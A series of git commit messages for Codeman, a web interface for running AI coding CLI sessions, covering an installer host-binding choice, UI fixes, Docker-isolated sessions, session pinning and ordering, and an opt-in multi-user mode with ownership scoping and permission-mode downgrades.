2) This machine only (127.0.0.1), the safer option, for tunnel/Tailscale
setups.
The choice flows into the systemd unit, the launchd plist (values escaped
for both formats), the run-now exec path, and the printed URLs (LAN IP
detection included). Non-interactive installs keep the safe loopback
default unless CODEMAN_HOST is preset; the server binary's own default
binding is unchanged.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
.toolbar-center is absolutely centered (left: 50%), so on viewports below
~1500px, or with long case names widening the left toolbar group, the voice
button rendered on top of the case picker's chevron and the + button. Below
1500px it now falls back into normal flex flow where overlap is impossible;
wide viewports keep the centered layout.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
On <430px screens the full Codeman wordmark wasted header space; the brand
now renders a single C (same tap target, still app.goHome()). Desktop and
tablet keep the full wordmark. The compact letter lives in a separate
aria-hidden span so i18n custom branding keeps rewriting only the wordmark.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Add a short what-is-Codeman pitch block with deep links after the hero GIF,
npm version + GitHub stars badges, and a closing star/issues CTA.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Adds src/docker-hosts.ts + src/docker-export.ts to the Infra row and
corrects the app.js size note (4906 lines), merged with the 1.7.0
i18n.js additions to the same rows.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Resolves the CLAUDE.md paragraph conflict with #162, skips the
windowTitle recompute for solo-session renders so a detached window
cannot reset the push-notification hostTitle prefix to the default,
and prettier-formats test/mobile/devices.ts (came in unformatted via
the #162 merge; CI format:check only covers src/**).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Quick Start now documents the consent-first flow (every system change is
prompted; the closing menu chooses terminal / background service / skip),
safe re-runs (finished installs update in place with local changes stashed
and the service restart verified; interrupted installs resume full setup;
install.sh update/uninstall), and the headless contract (system-changing
steps abort without CODEMAN_NONINTERACTIVE=1). The AI CLI note now says all
four CLIs are auto-detected with an install-or-skip choice when none exist,
and the background-service section points at installer menu option 2 before
the manual instructions. Same changes mirrored in README.zh-CN.md.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
README.md + README.zh-CN.md:
- New "Remote SSH Sessions" section (durable remote tmux, auto-reconnect,
discover/attach with detach-not-kill, shared sessions, injection-safe ssh)
- New "Session Manager & Command Palette" subsection (pinning survives kill,
name retention on resume, cross-device tab order sync)
- Multi-user quick start right after installation (users add + --multiuser),
and the zh-CN README gains the full Multi-User Mode section it was missing
- Security: document the configurable startup permission mode (skip/auto/
normal/allowedTools) and the multi-user auto downgrade
- Cron header button noted as opt-in (Header Displays); API section counts
refreshed (~190 handlers / 20 route modules) with pin, session-order and
unified endpoints; Development now recommends npm run test:ci
CLAUDE.md (/init audit): session-order.ts in the Session row, PR #157
session-manager polish appended to the unified-list pattern, opt-in Cron
button documented, route/SSE counts refreshed (20 modules, ~188 handlers,
~146 events)
install.sh: the post-install "How would you like to run Codeman?" menu (and
the CLI picker + yes/no prompts) read from stdin, which under curl | bash is
the pipe, so choices were impossible and the script silently fell through to
the default. New has_tty()/read_reply() helpers prompt via /dev/tty whenever
a real terminal exists (same approach the sudo path already used) and only
fall back to defaults when there is genuinely none, now with an info line
saying so. Verified both paths with a pty harness (script(1)) and setsid.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The Cron button now follows the same opt-in pattern as the Session Manager /
Away Digest / File Viewer buttons: the template ships the btn-cron--hidden
marker class and applyHeaderVisibilitySettings() removes it only when the
per-device showCronButton setting (App Settings -> Display -> Header Displays)
is enabled. Defaults flipped to false in the mobile defaults block and both
?? fallbacks. Cron jobs remain fully functional; only the launcher is opt-in.
Verified in a live browser: fresh profile hides the button + unchecked toggle,
enabling shows it immediately and persists across reload.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Resolutions (sse-events.ts / constants.js / app.js): unions of the docker/
multi-user event registrations from master with the session-order/pin events
from this branch.
Additions on top of the merge:
- POST /api/sessions/:id/pin now falls back to the persisted store record when
no live session exists: COD-142 deliberately preserves pinned records after
kill (and cleanupStaleSessions skips them), so without this a pinned-then-
killed session could never be unpinned. Owner-scoped in multi-user mode.
- SessionOrderUpdateSchema bounds (id <= 100 chars, <= 500 entries) so a buggy
client can't persist megabytes into state.json; empty strings still flow to
normalizeSessionOrder which drops them.
- Route tests for the persisted-record pin fallback.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The durable-launch section predated the #145 consolidation: owned launches use
the dedicated -L codeman-remote socket with codeman-ssh-<id8> names and
per-session set -t options (never -g). Discovery/attach (COD-105) genuinely
target the canonical -L codeman socket; the asymmetry is now called out.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Resolutions:
- session.ts: keep the extracted _buildRespawnPaneOptions() helper (COD-108)
and add master's docker/owner fields to it
- tmux-manager.ts: docker branch first, then remote via buildRemoteSessionCommand
(now an options object threading claudeMode/allowedTools into
buildRemoteLaunchCommand, preserving the 6.3 multi-user permission downgrade)
- case-routes.ts: keep master's adminOnly helper; gate the new COD-105 discovery
endpoint admin-only in multi-user mode (hosts are machine-level infra)
- settings-ui.js: union of remoteAutoReconnect + master's header-button defaults
- session-routes.ts: union of imports; session gets remote + owner
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Brings the docker session-mode deep-review work (intended for the skipped
1.4.2) onto the 1.5.x line: deterministic-conversation-id resume across
container stop/recreate, config-drift detection + POST /api/docker-cases/:name/recreate,
docker model-picker support, import-manifest hardening, remote-daemon (context/
daemonHost) correctness, comma-in-path rejection, and the zh-CN README re-translation.
Conflicts resolved to preserve BOTH the multi-user security scoping already on
master (ownership checks, workingDir confinement, permission downgrade) AND the
docker features. Version kept at master's 1.5.0 (the 1.4.2 bump is superseded;
a fresh changeset bumps to 1.5.1). tsc, eslint, and test:ci all green (3548 tests).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
The opt-in multi-user feature's only enforcement is web-layer scoping
(all sessions share one OS account). An adversarial review found 8 critical
+ 7 high cross-user holes that defeated it, plus mediums; all fixed here.
Single-user (flag-off) behavior stays byte-identical apart from documented
consistency deltas.
Ownership / confinement:
- DELETE /api/sessions (bulk) + /:id now owner-scope / findSessionOrFail
- quick-start, cron (create+fire), scheduled runs confine workingDir to the
owner's space; case link/docker-link/docker-import confine the host path
- resolveCasePath no longer resolves linked cases for non-admins; foreign
remote/docker cases are skipped (fall through to the caller's own local case)
- history, subagents/workflows, mux-sessions, orchestrator, cron run-history,
away-digest, and remote/docker host reads are owner- or admin-scoped
Permission policy (section 6.3):
- non-granted users are downgraded at every spawn site incl. legacy
/api/scheduled, PlanOrchestrator one-shots, remote launch, and the cron-fire
gemini/codex bypass switches; resolveClaudeModeForUsername now fails closed
Auth / store:
- verify-first login throttle (a correct password is never locked out),
/ws terminal subject to the change-password lockbox, cookie fast-path
re-validates identity live, role/grant changes revoke sessions, admin delete
runs the last-admin guard before any teardown
- users.json: distinguish missing (ENOENT) from corrupt/unreadable so a bad
read can't overwrite all accounts; unique per-process temp write path
Event streams:
- debounced session:updated + batched task:updated, clipboard, and push
notifications route by owner (fail closed); getLightState hides machine-wide
globalStats from non-admins
Tests: two suites updated to assert the fixed (secure) behavior. tsc, eslint,
and test:ci all green.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
A Playwright browser pass found the injected 9th App Settings tab (Users)
overflowed the non-wrapping .modal-tabs flex row and landed under the modal
backdrop (elementFromPoint returned .modal-backdrop, not the button), so a real
mouse click was intercepted. flex-wrap:wrap lets the tabs wrap to a second row;
the built-in 8-tab modals still fit on one row (no visual change).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Stamp the plan doc with shipped-by-phase status; add the multi-user Key Patterns
entry + State Files + case-spaces note to CLAUDE.md; add a multi-user section to
the security architecture (threat model: workspace separation, not a security
boundary) and a README opt-in section; add a minor changeset.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- public/admin-ui.js (new, self-contained): on boot fetches GET /api/me and
stores window.__codemanUser; installs a fetch interceptor that opens a
change-password modal on any 403 PASSWORD_CHANGE_REQUIRED (and on boot when
mustChangePassword is set); for a multi-user admin, injects a "Users" tab into
the existing App Settings modal (create/reset/disable/enable/promote/demote/
grant-bypass/delete with typed confirm + one-time-password reveal). No header
button, so the mobile-header policy stays green; nothing renders in single-user
mode.
- me-routes: GET /api/me returns a `multiUser` flag so the UI distinguishes a
single-user admin (no admin UI) from a multi-user admin.
- index.html: load admin-ui.js after settings-ui.js, before session-ui.js.
Tests: test/admin-ui.test.ts (JSDOM: identity boot, Users-tab injection gating by
role/mode, forced change-password modal, script-order wiring). Backend verified
end-to-end by test/admin-routes.test.ts against a live server. A full Playwright
pass is recommended before merge.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
- routes/admin-routes.ts: GET/POST /api/admin/users, PATCH/DELETE
/api/admin/users/:username, reset-password, logout. Multi-user only (404
otherwise), requireAdmin, last-admin invariants, one-time-password on create /
reset (returned once + mustChangePassword), disable/reset/delete revoke cookie
sessions, delete kills the user's live sessions first (normal teardown) and can
delete their space (guarded). Per-user stats (live/active sessions, case count).
- web/admin-audit.ts: append-only ~/.codeman/admin-audit.jsonl (timestamp, acting
admin, action, target, IP) for every user-management action.
- SSE admin:usersChanged + auth:passwordChangeRequired (sse-events.ts + constants.js).
fix(user-store): serialize users.json read-modify-write
touchLastLogin fires on every Basic auth (fire-and-forget) and was racing route
writes (create/update), clobbering records — a real corruption bug surfaced by
the admin tests. All mutators now run under a single write lock, and
touchLastLogin is throttled to once/minute per user to bound disk churn.
Tests: test/admin-routes.test.ts (8, live server) + user-store lock verified by
the existing user-store suite.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Scopes real-time streams and the init snapshot so a multi-user client only
receives what it owns. No-op in single-user mode (identity-less clients).
- WS terminal (ws-routes): owner gate after the session lookup. A non-admin may
only attach to their own session (close 4003); the global auth hook already
ran on the upgrade and decorated req.authUser, so an unauthenticated upgrade
never reaches the handler.
- SSE (sse-stream-manager): per-client identity stored at addClient; broadcast()
and the terminal-batch flush both enforce a routing hint via canDeliver().
WebServer.broadcast auto-derives the hint (deriveSseHint): session-scoped event
families resolve the owner from the payload's session id (fail closed when the
owner can't be resolved), machine-level families (docker/tunnel/update/system/
cron) + host-plan telemetry are admin-only, everything else stays global. Raw
terminal bytes resolve the owner once and are withheld from non-owners.
- getLightState is filtered per connection AFTER the shared cache (sessions,
respawnStatus, subagents, workflowRuns by owner; scheduledRuns + planUsage
admin-only); applied to both the SSE init snapshot and GET /api/status.
- file-routes: getKnownSessionWorkingDir + getSessionAttachmentHistory (the
preview/thumbnail/history helpers that bypass findSessionOrFail) now owner-check
the session, closing a cross-user file-read path.
- GET /api/search: harvestSources is owner-scoped.
Deferred to a follow-up (documented in docs/multi-user-plan.md): away-digest +
subagent/workflow REST list scoping, push-subscription identity + routing,
per-user screenshot subdirs. The live-event versions of these are already routed
by the SSE hint; only the on-demand REST aggregates remain global for admins-only
follow-up.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Threads per-user ownership through sessions, cases, cron, and the permission
policy. All scoping is a no-op in single-user mode (isMultiUserMode() guards).
Sessions
- Session.owner stamped at every create path from req.authUser / job.owner:
POST /api/sessions, /api/run, /api/quick-start, ralph start, cron launch,
plan generation. Round-trips through recovery (MuxSession.owner mirror, read
muxSession.owner ?? savedState?.owner) and the mux layer.
- findSessionOrFail(ctx, id, req) now does a NOT_FOUND owner check (never 403, so
other users' session existence is not leaked); wired at ~50 call sites.
- List endpoints filtered by owner: GET /api/sessions, /api/sessions/unified
(live+persisted+lifecycle scoped, host-wide transcripts admin-only), cron jobs.
Permission policy (section 6.3)
- resolveClaudeModeForUsername wraps getClaudeModeConfig at every spawn site so a
non-granted user is forced to --permission-mode auto (bypass -> auto), including
recovery (or a reboot would un-downgrade). buildPromptArgs now respects the
session's claudeMode, closing the one-shot (runPrompt) bypass hole.
- Shell mode and cron launchCommand require canBypassPermissions: 403 at
POST /api/sessions, /api/quick-start create, cron job create, AND cron fire time
(re-checked against the owner's current grant).
Cases
- resolveCasesDir(user): per-user ~/codeman-users/<name>/cases in multi-user, the
shared ~/codeman-cases otherwise. All case CRUD + ralph + plan + quick-start
resolve through it. resolveCasePath is owner-aware.
- GET /api/cases scoped per user (own folders; legacy linked cases admin-only;
remote/docker cases owner-filtered). RemoteCase/DockerCase gain owner, stamped
at link/quickcreate/import.
- Remote + Docker host CRUD is admin-only.
- Non-admin workingDir confinement (the linchpin): realpath must resolve inside the
user's space, enforced at POST /api/sessions and /api/run BEFORE any disk write.
Limits
- sessionCapacityState / sessionCapacityMessage centralize the global + per-user
cap (CODEMAN_MAX_SESSIONS_PER_USER, default global/2), replacing the 6 copy-pasted
MAX_CONCURRENT_SESSIONS checks.
Tests: test/ownership-scoping.test.ts (case isolation, host-CRUD gate, workingDir +
shell gates, and the scoping helpers). Deferred to phase 4: WS owner gate, SSE
fan-out filtering, file-route preview/thumbnail helper scoping, push routing.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Adds a parallel multi-user auth branch (the single-user Basic-auth path is
left byte-identical). Off unless CODEMAN_MULTIUSER/--multiuser.
- middleware/auth.ts: mode-selecting registerAuthMiddleware. New async
multi-user hook verifies username:password against the user store (scrypt),
mints identity-carrying cookies, decorates req.authUser, enforces a per-IP
AND per-username failure bucket, and the mustChangePassword lockbox. The
hook-secret loopback bypass is now a single shared helper used by both
branches. FastifyRequest.authUser module augmentation.
- ports/auth-port.ts: AuthSessionRecord gains username/role/mustChangePassword.
- user-store.ts: verifyPassword (timing-equalized against user enumeration).
- route-helpers.ts: getAuthUser (synthetic admin fallback), canAccessOwned,
requireAdmin, revokeUserSessions; findSessionOrFail gains an optional req for
a NOT_FOUND owner check (dormant until phase 3 wires callers).
- routes/me-routes.ts: GET /api/me (synthetic admin in single-user) and
POST /api/me/password (verify current, min 8, clear mustChangePassword,
revoke other sessions).
- QR: QrTokenRecord + AuthSessionRecord carry a username; tunnel-manager
mintUserToken / consumeTokenWithIdentity / getQrSvgForCode; /q/:code binds
the cookie to the token's user (rejects identity-less tokens in multi-user);
GET /api/tunnel/qr mints a per-user token. Single-user keeps the rotating token.
- server.ts: bootstrap the initial admin from CODEMAN_USERNAME/PASSWORD on first
boot (refuse to start with no users); multi-user with >= 1 user satisfies the
non-loopback auth requirement and the tunnel-enable guard; userFailures bucket
disposal.
- types/api.ts: FORBIDDEN, PASSWORD_CHANGE_REQUIRED, USER_EXISTS, USER_NOT_FOUND,
LAST_ADMIN error codes (message + status wired).
- Session.owner field + getter/setter, SessionState.owner, MuxSession.owner,
CreateSessionOptions.owner (foundation for phase 3 ownership threading).
Tests: test/multiuser-auth.test.ts (10, live server on 3170/3171). Existing auth
suite (auth-security, qr-auth, cod54-hook-event, network-auth-policy) unchanged
and green; full test:ci sweep passes (3519 tests).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Adds Anthropic's classifier-guarded low-prompt mode (--permission-mode
auto) as a fourth ClaudeMode alongside skip-permissions/normal/allowedTools.
Wired through both spawn paths (buildPermissionArgs for direct PTY,
buildClaudePermissionFlags for tmux), the getClaudeModeConfig validator,
and the App Settings Startup Mode picker. Exports buildSpawnCommand for
test coverage.
This is the prerequisite for multi-user mode section 6.3, which downgrades
non-granted users' sessions to 'auto'.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Design plan for opt-in multi-user support (per-user case spaces, admin
panel, ownership scoping). Ported onto master as the base for the
feat/multiuser-mode implementation branch.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Design for opt-in --multiuser: per-user case spaces, scrypt-hashed
users.json, ownership threading across sessions/cases/SSE/push, admin
panel, and a per-user Claude permission-mode policy. Reviewed against
the actual auth/SSE/case/session code; the plan encodes verified
call-site inventories, the non-admin workingDir confinement rule,
WS-upgrade identity plumbing, per-user QR minting, and the linked-cases
v2 format migration.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Bring the Chinese README to 1:1 section parity with the English one.
Adds the three missing sections (Using Codeman: A Human's Guide,
Driving Codeman from an Agent: Programmatic Guide, and Versioning),
updates the keyboard-shortcut table to the current registry (session
palette chord, Option bindings, prev/next tab), refreshes the API
section (18 route modules / ~160 handlers, ApiResponse envelope note,
Sessions rows with clientId+seq, new Cron table), and adds the
SECURITY.md disclosure pointer to the Security intro.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
CLAUDE.md (the 1.4.1 release commit only reformatted it): document the
seeded credential-isolation model (resolveDockerClaudeArtifacts /
resolveDockerCredentialArtifacts, buildSeamlessClaudeConfig), the
auto-built agent base image (ensureAgentBaseImage + docker:imageBuild*
SSE events), the C.UTF-8 image locale, w<n>-<case> tab naming, and the
opt-in File Viewer header button; bump the SSE registry count to ~138.
README.md: add Gemini to every CLI enumeration (tagline, install, WSL,
Multi-CLI, security, architecture diagram), split the Docker section's
hardening bullet into hardening + seamless-auth/credential-isolation,
note the base image now auto-builds on first use, add a File Viewer
bullet to More Features.
README.zh-CN.md: mirror all of the above, add the previously missing
"Isolated Docker Sessions" section and a Docker bullet in More
Features, fix the Node badge to 22+, and run prettier over the file.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Docker cases: seamless Claude auth (seed ~/.claude.json instead of the
corruption-prone single-file mount), full credential-store isolation for
claude + codex/gemini/gcloud/opencode (share only transcripts/rollouts,
seed the rest), auto-build the base image on first use, C.UTF-8 locale
(fixes box-drawing), collapsed/shortened Create-Case UI + short "(docker)"
case-menu tags, and w<n>-<case> tab naming for docker/remote sessions.
Also: opt-in File Viewer header button; fix a TZ-boundary flaky test.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- CLAUDE.md: rewrite the Docker cases Key Pattern to the shipped 1.4.0 state
(removes the stale "not on master / Phases remaining" framing); add
docker-quickcreate/templates/GPU/elastic-disk/export-import, the
CODEMAN_DOCKER_BRIDGE_HOOKS listener, docker state files, env vars, route +
SSE counts, and the build-agent-image command.
- README.md: new "Isolated Docker Sessions" section + a More Features bullet.
- docs/security-architecture.md: new §10 "Docker container isolation" (hardening,
commit-safe creds, blast radius, untrusted-import safety, bridge-hooks) +
Quick-reference env vars.
docs/docker-cases.md (user guide) and docs/docker-cases-plan.md (design) were
shipped with the feature.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- One-click "Run in Docker" gains an expandable settings panel with a Template
picker (Small 2G/1 · Medium 4G/2 default · Large 8G/4 · GPU 8G/4/all) plus
memory/cpu/gpu/network/image/mount-creds overrides. Any tweak creates a dedicated
per-case host; the plain checkbox keeps using the shared `default` host.
- GPU passthrough: `gpus` on DockerHost/SessionDocker -> `--gpus <value>` in create
args (needs the NVIDIA container toolkit). Elastic disk: no `--storage-opt` cap,
so container storage grows as data flows in.
- CODEMAN_DOCKER_BRIDGE_HOOKS=1: opt-in second listener on the docker bridge gateway
(auto-detected 172.17.0.1, override CODEMAN_DOCKER_BRIDGE_HOST) that serves ONLY
the hook endpoints and delegates into the secret-gated pipeline, so in-container
hooks fire on a loopback-only server. Non-hook paths -> 403; host-internal, not LAN.
Verified live: Large template applies real 8GB/4CPU limits; a secret-authenticated
hook POST from inside a container now reaches the handler (was connection-refused);
non-hook paths return 403; template UI + GPU field verified via Playwright.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- New POST /api/cases/docker-quickcreate: creates a normal case (folder in
CASES_DIR, scaffolded CLAUDE.md + hooks) AND links it to a hardened container
with default settings, auto-provisioning a shared `default` docker host — the
user never touches host/image/network fields.
- Create New tab gains a "Run in isolated Docker container" checkbox; on submit it
calls docker-quickcreate then auto-starts a claude session inside the container.
- Case Manage list gains an Export (full-image) button per docker case.
- SSE listeners for docker:exportComplete/exportFailed toast + refresh the exports
list.
Verified end-to-end on the live instance: one-click create put the case in
~/codeman-cases/<name>, auto-created the default host, launched claude in the
container; export button produces a bundle; checkbox + button render (Playwright).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Found in live testing: claude refuses its default /tmp/claude-<uid> temp dir when
that path pre-exists root-owned (happens when the workspace bind-mount traverses
it, e.g. a workspace under /tmp/claude-<uid>). Set CLAUDE_CODE_TMPDIR to a
nonexistent HOME subpath the running uid creates+owns, so docker claude sessions
are robust to any workspace location.
Also document the hook-reachability constraint: in-container hooks POST to
host.docker.internal (the bridge gateway), so they only fire when Codeman is
reachable from the container (bind 0.0.0.0 + password); on a loopback-only bind
they don't fire and idle detection falls back to output-based (which works).
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Per-device App Settings > Header Displays toggles that show/hide the session
manager and away-digest header buttons (default OFF) and the cron footer
button (default ON). Adds the load/save/apply/default/displayKeys wiring in
settings-ui.js plus the marker CSS in styles.css. Client-only display keys,
stripped from the settings PUT so they never reach the strict server schema
(mirrors the showAttachmentsButton pattern); session/away stay hidden on
phones via the existing mobile.css rules. The button markup and checkbox
rows landed earlier in 5728b86.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- index.html: Create Case "Docker" tab (name/workspace/host/image/network +
advanced memory/cpus/mountCredentials/resumeOnStart), and a Docker-exports
section in the Manage tab
- session-ui.js: linkDockerCase (POST docker-host, PUT on conflict, then
docker-link; omitted optionals as undefined not null), case-picker label
"name @ container" + search fields, switchCaseModalTab/submitCaseModal docker
branch, and export/import UI (refresh/export/import/delete). Docker cases route
through /api/quick-start like remote (runClaude/runShell/runOpenCode/Codex/Gemini)
- verified in a real browser (Playwright): Docker tab renders, linking through the
UI creates the case and it appears in the picker as "uitest @ codeman-case-uitest"
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- src/docker-export.ts: full-image export (pause-consistent commit + save|stream +
workspace tar + manifest -> one .codeman-container.tgz) and workspace-only; import
validates manifest + per-member sha256, traversal-guards the workspace tar, docker
load + quarantine re-tag (never overwrites a local tag). Bounded by
runWithConversionLimit; free-space precheck; docker rmi in finally; sealed
containers refuse full-image export.
- routes: POST /api/docker-cases/:name/export (background + SSE), GET/DELETE
/api/docker-exports, GET download, POST /api/docker-cases/import (-> new host+case)
- instance-scoped boot reaper (docker-hosts.reapOrphanedDockerContainers) wired after
restoreMuxSessions; never touches another instance's containers
- SSE docker:exportComplete/exportFailed/importComplete (both registries)
- fix: stream pipeline in saveImageToTar so the bundle isn't truncated
VERIFIED end-to-end on real docker: full export -> 326MB valid bundle -> delete
case -> import -> new container runs from the quarantined image with the workspace
file AND the in-image change both restored.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
An in-container hook curl carries Host: host.docker.internal:<port> (the derived
CODEMAN_API_URL), so the always-on host guard must allow host.docker.internal /
host.containers.internal or every in-container hook is blocked 403. Exact-match
only; not a browser DNS-rebinding surface (resolves to the host only from inside
a container netns). Verified end-to-end: quick-start launches claude/shell in a
real container with the workspace bind-mounted and hooks scaffolded.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
- Session: _docker field, constructor config, toState, createSessionOptions/
respawnPaneOptions (both interactive + shell paths), docker getter
- resolveMuxAttachCwd returns /tmp for docker sessions (local wrapper only execs)
- skip the LOCAL claude version probe for docker; probe the IN-CONTAINER version
instead (deferred) so wheel-forwarding stays enabled (#154)
- server restoreMuxSessions round-trips MuxSession.docker / SessionState.docker
- full CI suite green (3444 passed)
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
node:22-bookworm-slim ships a `node` user at uid 1000, so `useradd -u 1000`
failed. Auto-assign the uid and rely on gid-0 + group-writable HOME so any
runtime `--user <hostUid>:0` can write $HOME. Verified: image builds; toolchain
(node/tmux/claude/codex/gemini/opencode) present; `--user 1000:0` writes
/home/agent and `claude --version` runs.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Building on COD-140's firstPrompt backfill, surface each session's most
recent user prompt too, so a long-running session is identifiable by both
where it started and where it is now.
- session-routes: add extractLastUserPrompt() (mirrors extractFirstUserPrompt
with last-match semantics + same noise/secret/slash-command filters + 120
cap); scanProjectDir computes lastPrompt from the file tail (reads a tail for
large files; small files scan head); thread lastPrompt through HistorySession
and the /api/sessions/unified history rows.
- unified-session-service: add lastPrompt to UnifiedSessionItem + HistoryInput,
set it from history in the merge, and extend the backfill with parallel
by-uuid / newest-by-workingDir indexes (never overwrites); add lastPrompt to
the filterAndPaginate search haystack.
- terminal-ui: render a 'Last prompt' detail row, omitted when absent or equal
to the first prompt (single-prompt sessions show one line).
Tests: unified-session-service.test.ts +5 (uuid-join, workingDir fallback,
newest-wins, no-overwrite, search). Beta-verified: /api/sessions/unified
populated firstPrompt+lastPrompt on all 200 rows (12 distinct); Playwright on
the session-manager modal rendered 12 'Last prompt' rows, 0 console errors.
(cherry picked from commit 115f4d397e91decc1a6381b47a99d74922e9055b)
The unified session list only set firstPrompt from the transcript-history
view, keyed by the Claude transcript file's UUID. A live/persisted row
keyed by its Codeman id only inherited a prompt when that id happened to
equal an on-disk transcript filename; when it didn't (stale/wrong
claudeSessionId, post-/clear new uuid, resumed/attached/worktree session),
the session manager showed "(no prompt captured)" even though a real
transcript for that working dir existed under a different UUID.
Add a pure firstPrompt backfill pass in mergeUnifiedSessions (after the
merge loops, using the already-passed history source): for any row with no
firstPrompt, join by claudeSessionId first, then fall back to the newest
transcript in the same workingDir. Never overwrites a non-empty prompt, so
rows keyed to their own transcript are untouched; rows with genuinely no
transcript still show the placeholder. Pure, unit-tested (+5).
(cherry picked from commit 1f9f53ec64a61c9fa7f77d29efcbdd1d2794ec38)
A killed session was full-deleted from state.json (removeSession),
dropping the COD-139 pinned/pinnedAt fields, so the session vanished
from the session-manager pinned group. cleanupStaleSessions also reaped
any persisted record with no live session on boot, which would have
wiped a preserved pin on the next restart.
Fix (state-store):
- demoteOrRemoveSession(id): on kill, demote a *pinned* record to a
lightweight stopped record (status=stopped, pid=null, pin retained)
instead of deleting; unpinned records are removed as before.
- cleanupStaleSessions skips pinned records so the pin survives restart.
- server _doCleanupSession calls demoteOrRemoveSession on the killMux
path (shutdown path unchanged).
Restoration iterates live mux sessions, not state.json, so a stopped+
pinned record is never auto-revived. Unit-tested on the real StateStore
path (state-store.test.ts +4); session-cleanup/session-pin regress green.
(cherry picked from commit 86f183eacfc3f2f6ac28499fb1ae2d21eef2bbed)
resumeHistorySession ignored the row's name and always synthesized a fresh
w<N>-<dir> name from the working dir, so resuming a custom-named session lost its
name. Thread the name through resumeHistorySession(sessionId, workingDir, name) and
extract the choice into a pure _resolveResumeName helper: prefer a non-empty existing
name, else generate the next free w<N>-<dir>. Forward s.name at all three call sites
(terminal-ui.js history-item + session-manager menu, session-ui.js run-mode history);
sessions without a name fall back to the generated name (unchanged behavior). The
unified session rows already carry name, so session-manager rows resume with it.
TDD: test/resume-name.test.ts drives the real _resolveResumeName via vm-harness.
(cherry picked from commit 56c7906a48d8b453ed55810a02ec70f72d34ed32)
Pin/unpin a session via POST /api/sessions/:id/pin {pinned}; pinned sessions
sort above unpinned in the unified session manager list (COD-121), ordered by
pinnedAt descending. Pin state lives on SessionState, persists to state.json,
and survives reload/reconnect/restart (persisted-input carries pinned; the
merge skips undefined so a recovered live session can't clobber it). New SSE
event session:pinned re-sorts the open list live across clients. Pin/Unpin
affordance in the session-row kebab menu with a 📌 glyph + amber highlight.
(cherry picked from commit 82749747039afcd4a3104f6a97ce7d3c2ddd048d)
Tab reordering (drag-and-drop + Ctrl+Shift+{/}) persisted only to
localStorage (codeman-session-order), so each device kept its own private
order. Add server-side persistence so the order follows the user across
devices, live. Takes the issue's recommended default (a): one global order,
server authoritative, localStorage as offline fallback.
- session-order.ts (new, pure + unit-tested): normalizeSessionOrder (coerce
to string[], drop empty/non-string, dedup) and mergeSessionOrder (the
pushing device's order wins; ids the device hadn't loaded fall to the end
in their existing relative order, never dropped — graceful for
closed/remote/parked sessions absent on that device).
- AppState.sessionOrder?: string[]; StateStore get/setSessionOrder + the field
added to buildPartialJson() (the incremental serializer whitelists fields,
so without this the value never reached disk / survived a restart).
- PUT /api/session-order (session-routes): parse -> merge -> persist ->
broadcast session:orderChanged; getLightState() init snapshot now carries
sessionOrder so a fresh load/reconnect restores it.
- SSE event session:orderChanged registered in sse-events.ts + constants.js.
- app.js: handleInit seeds localStorage from the server snapshot before
syncSessionOrder(); saveSessionOrder() also PUTs to the server (debounced
400ms, covers drag + both keyboard moves); _onSessionOrderChanged adopts a
remote order and re-renders (no-op-guarded to avoid echo flicker).
Verified (orchestrator re-ran all gates): tsc 0, lint 0, frontend-syntax +
prettier clean, build ok; session-order + session-order-routes + state-store
56/56. Functional round-trip on an isolated beta: PUT {a,b,c} -> status
snapshot reflects it; merge PUT {c,a} vs {a,b,c} -> {c,a,b} (b preserved at
end); malformed payload rejected with a clean 400; sessionOrder persisted to
state.json and survived a restart.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
(cherry picked from commit 79415f2fdfbdf3fbe362a063534e7f84c553eefb)
55f5ada (COD-105) added Phase 2 of the remote-tmux arc: discover codeman-*
sessions on a host and attach to non-owned ones, with detach-not-kill on close.
- Data model: SessionRemote.owned/remoteSessionName + RemoteSessionInfo;
toSessionRemote (owned:true) vs toAttachedSessionRemote (owned:false).
- New Ownership section: discovery (listRemoteCodemanSessions, the literal-\t
parse quirk, never-throws/VITEST), attach-vs-launch selection
(buildRemoteSessionCommand), and the killSession detach-not-kill guarantee.
- API: GET /api/remote-hosts/:hostId/sessions + the attachRemoteSession
create path.
- CLAUDE.md Remote Key Pattern notes discover/attach + detach-not-kill.
Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
